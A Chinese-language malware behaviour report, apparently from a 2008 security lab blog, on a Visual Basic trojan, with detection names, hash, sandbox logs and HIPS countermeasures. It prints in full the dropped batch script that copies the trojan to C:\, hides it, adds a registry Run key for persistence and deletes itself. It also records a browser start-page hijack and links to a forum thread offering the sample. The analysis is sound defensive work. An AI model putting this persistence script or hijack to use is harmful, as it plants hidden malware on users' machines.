行为分析 Generic.Malware.SCsp.2C99A774

病毒名称：BitDefender：Generic.Malware.SCsp.2C99A774
            Kaspersky：-
            NOD32v2：probably unknown NewHeur_PE
            Rising：Trojan.Win32.VB.zva
VT扫描时间：09.29.2008 19:47:35 (CET)
EQS Lab编号：080930109
EQS Lab地址： [url]http://hi.baidu.com/eqsyssecurity[/url]
病毒大小：28.0 KB (28,672 字节)
MD5码：F85362B22F5AC46B9674DA2FEBB5D631
病毒类型： 特洛伊木马
主要传播方式： 网络
测试平台： WinXP SP3系统 (默认Shell为BBlean)    EQSecurity（HIPS） 实机
危害程度：★★★☆☆

病毒行为：

运行后向所在目录释放BAT并调用

2008-09-30 20:35:27 运行应用程序   
进程路径:F:\Once\15\15.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c F:\Once\15\Dx.bat
触发规则:高优先规则->In Side->%windir%\system32\cmd.exe

BAT内容：
@ECHO off
color 0A
copy 15.exe c:\notoped.exe >nul
attrib +r +s +h c:\notoped.exe >nul
@REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
del %0

将自身复制到C:\notoped.exe

2008-09-30 20:35:27 创建文件   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\notoped.exe
触发规则:所有程序规则->文件阻止及保护->?:\*.exe

创建txt

2008-09-30 20:35:40 创建文件   
进程路径:F:\Once\15\15.exe
文件路径:C:\text.txt
触发规则:所有程序规则->文件夹保护->C:\*

添加附加属性

2008-09-30 20:36:19 运行应用程序   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:+r +s +h c:\notoped.exe
触发规则:所有程序规则->系统工具->%windir%\system32\attrib.exe

添加启动项

2008-09-30 20:36:31 运行应用程序   
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
触发规则:所有程序规则->系统工具->%windir%\system32\reg.exe

创建快捷方式

2008-09-30 20:36:44 创建文件   
进程路径:F:\Once\15\15.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Internet Explorer.lnk
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*\桌面\*

修改主页

2008-09-30 20:36:57 修改注册表内容   
进程路径:F:\Once\15\15.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Start Page
更改后: [url]http://www.dxcpm.com/?44_20080930[/url]
更改前: [url]http://www.shendu.com/[/url]
触发规则:所有程序规则->IE浏览器相关->*\Software\Microsoft\Internet explorer\Main

联网行为：




关键行为：

调用CMD

向C:\创建exe



HIPS防范对策：


阻止陌生程序调用CMD   attrib.exe

阻止陌生程序向C:\创建exe

阻止陌生程序修改首页

样本下载：[url]http://bbs.janmeng.com/thread-803714-1-1.html[/url]